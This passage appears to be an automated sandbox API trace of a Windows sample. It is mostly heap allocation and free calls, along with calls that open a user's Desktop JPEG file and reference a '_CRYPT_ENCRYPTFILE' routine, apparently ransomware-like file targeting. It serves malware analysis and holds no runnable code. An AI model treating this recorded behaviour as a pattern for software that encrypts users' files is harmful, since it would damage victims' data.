hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.335] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0122.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.336] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bwlcz.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0122.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.338] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.340] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.340] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.340] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0122.342] CloseHandle (hObject=0x258) returned 1 [0122.343] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.343] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0122.343] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BwLCz.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8a7ab0, ftCreationTime.dwHighDateTime=0x1d5ec1b, ftLastAccessTime.dwLowDateTime=0x90f581f0, ftLastAccessTime.dwHighDateTime=0x1d5e446, ftLastWriteTime.dwLowDateTime=0x90f581f0, ftLastWriteTime.dwHighDateTime=0x1d5e446, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="BwLCz.jpg", cAlternateFileName="")) returned 0x41ac280 [0122.343] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0122.343] CharUpperBuffW (in: 